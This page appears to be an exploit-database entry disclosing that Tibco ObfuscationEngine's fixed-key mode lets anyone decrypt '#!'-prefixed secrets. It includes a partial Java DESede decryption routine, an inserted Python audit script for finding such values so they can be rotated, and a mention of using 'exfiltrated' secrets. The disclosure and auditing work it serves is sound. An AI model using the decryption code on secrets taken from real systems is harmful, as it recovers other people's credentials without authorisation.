Exploits / Vulnerability Discovered: 2020-12-09 | Type: local | Platform: multiple
This exploit / vulnerability, Tibco ObfuscationEngine 5.11 fixed key password decryption, is for educational purposes only; if you use it, you do so at your own risk!
# Exploit Title: Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption
# Date: December 8th 2020
# Exploit Author: Tess Sluijter
# Vendor Homepage: https://www.tibco.com
# Version: 5.11x and before
# Tested on: MacOS, Linux, Windows
# Tibco password decryption exploit
## Background
Tibco's documentation states that there are three modes of operation for this ObfuscationEngine tooling:
1. Using a custom key.
2. Using a machine key.
3. Using a fixed key.
This write-up pertains to #3 above.
Secrets obfuscated using the Tibco fixed key can be recognized by the fact that they start with the characters #!. For example: "#!oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA".
## Issues
On Tibco's forums, but also on other websites, people have already shared Java code to decrypt secrets encrypted with this fixed key. For example:
Regardless of country, customer, network or version of Tibco, any secret that was obfuscated with Tibco's ObfuscationEngine can be decrypted using my Java tool. It does **not** require access to Tibco software or libraries. All you need are exfiltrated secret strings that start with the characters #!. Tibco is not going to fix this: it is a design decision, also used for backwards compatibility in their software.
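Because every `#!` value is recoverable, the practical step on the defending side is to find where such values still sit in configuration so they can be rotated or moved to another mode. The following audit script is an added example, not part of the original write-up or of any Tibco tooling. It assumes an 8-byte cipher block (DESede) with the IV stored as the first block, as in the decryption code on this page; the sample config and the setting names in it are constructed.

```python
import base64
import binascii
import re

# Assumption: DESede has an 8-byte block, and the page's code reads one block
# of IV before the ciphertext, so a real token decodes to IV + >= 1 block.
BLOCK = 8
TOKEN = re.compile(r"#!([A-Za-z0-9+/]+={0,2})")

def is_fixed_key_token(b64_body):
    """True if the text after '#!' has the shape of an obfuscated secret."""
    try:
        raw = base64.b64decode(b64_body, validate=True)
    except (binascii.Error, ValueError):
        return False  # e.g. '#!/bin/sh' is not valid base64
    return len(raw) >= 2 * BLOCK and len(raw) % BLOCK == 0

def scan(text, source="<input>"):
    """Return findings as (source, line number, setting name, redacted value)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in TOKEN.finditer(line):
            if not is_fixed_key_token(match.group(1)):
                continue
            # Setting name: whatever precedes '=' or ':' on the line, if anything.
            name = re.split(r"[=:]", line[:match.start()])[0].strip() or "?"
            redacted = match.group(0)[:6] + "..."  # never echo the full secret
            findings.append((source, lineno, name, redacted))
    return findings

# Constructed sample config; the first value is the example string from the page.
SAMPLE = """\
#!/usr/bin/env bash
db.user=appuser
db.password=#!oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA
jms.password = #!{constructed}
comment=see ticket #!42
""".format(constructed=base64.b64encode(bytes(range(24))).decode())

if __name__ == "__main__":
    for src, lineno, name, value in scan(SAMPLE, "sample.properties"):
        print(f"{src}:{lineno}: {name} uses a fixed-key obfuscated value ({value}); rotate it")
```

The length check is what keeps shebang lines such as `#!/usr/bin/env` out of the report even though their text is valid base64.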
## Instructions
Compile with:
```
javac decrypt.java
```
Examples of running, with secrets retrieved from websites and forums:
```java
// Excerpt: message, algo and keyBytes are defined outside this fragment.
ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(message);
Cipher decipher = Cipher.getInstance(algo);
int i = decipher.getBlockSize();
// The first cipher block of the message is read as the IV.
byte[] ivSetup = new byte[i];
byteArrayInputStream.read(ivSetup);
SecretKey key = new SecretKeySpec(keyBytes, 0, keyBytes.length, "DESede");
// Cipher.DECRYPT_MODE is the named constant for the literal 2.
decipher.init(Cipher.DECRYPT_MODE, key, new IvParameterSpec(ivSetup));
// Magic, I admit I don't understand why this is needed.
CipherInputStream cipherInputStream = new CipherInputStream(byteArrayInputStream, decipher);
char[] plaintext;
char[] arrayOfChar1 = new char[(message.length - i) / 2];
byte[] arrayOfByte4 = new byte[2];
byte b = 0;
```